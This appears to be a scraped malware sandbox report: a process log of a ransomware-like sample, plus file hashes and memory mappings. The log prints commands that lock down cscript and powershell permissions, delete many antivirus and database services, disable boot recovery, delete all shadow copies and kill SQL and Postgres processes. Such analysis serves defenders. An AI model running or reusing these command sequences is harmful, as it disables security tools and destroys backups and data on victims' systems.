C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "McAfeeFramework"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "macmnsvc"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "masvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfemms"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfevtp"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmPreFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "VSApiNt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmCCSF"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmProxy"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ntrtscan"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ofcservice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmPfw"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PccNTUpd"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "PandaAetherAgent"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "PSUAService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "NanoServiceMain"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPIntegrationService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "EPProtectedService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPRedline"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPSecurityService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPUpdateService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "UniFi"3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exeC:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exeC:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exeC:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"4⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.batFilesize
53KB
MD5b57545cb36ef6a19fdde4b2208ebb225
SHA11d319740835ff12562e04cc74545a047bba63031
SHA256445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
SHA5123618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856
-
memory/208-404-0x0000000000000000-mapping.dmp
-
memory/252-402-0x0000000000000000-mapping.dmp
-
memory/524-657-0x0000000000000000-mapping.dmp
-
memory/744-506-0x0000000000000000-mapping.dmp
-
memory/756-530-0x0000000000000000-mapping.dmp
-
memory/760-409-0x0000000000000000-mapping.dmp
-
memory/1012-392-0x0000000000000000-mapping.dmp
-
memory/1016-393-0x0000000000000000-mapping.dmp
-
memory/1184-203-0x0000000000000000-mapping.dmp
-
memory/1432-741-0x0000000000000000-mapping.dmp
-
memory/1608-408-0x0000000000000000-mapping.dmp
-
memory/2124-190-0x0000000005BD0000-0x0000000005BF2000-memory.dmpFilesize
136KB
-
memory/2124-188-0x0000000005B00000-0x0000000005B92000-memory.dmpFilesize
584KB
-
memory/2124-134-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-135-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-136-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-137-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-138-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-139-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-140-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-141-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-142-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-143-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-144-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-145-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-146-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-147-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-148-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-149-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-150-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-151-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-152-0x0000000000540000-0x0000000000548000-memory.dmpFilesize
32KB
-
memory/2124-153-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-154-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-155-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-156-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-157-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-158-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-159-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-121-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-161-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-162-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-122-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-164-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-165-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-166-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-167-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-168-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-169-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-170-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-171-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-172-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-173-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-174-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-175-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-176-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-177-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-178-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-179-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-180-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-181-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-182-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-183-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-184-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-187-0x00000000057B0000-0x00000000059D6000-memory.dmpFilesize
2.1MB
-
memory/2124-123-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-189-0x00000000060A0000-0x000000000659E000-memory.dmpFilesize
5.0MB
-
memory/2124-120-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
memory/2124-192-0x0000000005D10000-0x0000000006060000-memory.dmpFilesize
3.3MB
-
memory/2124-132-0x0000000077710000-0x000000007789E000-memory.dmpFilesize
1.6MB
-
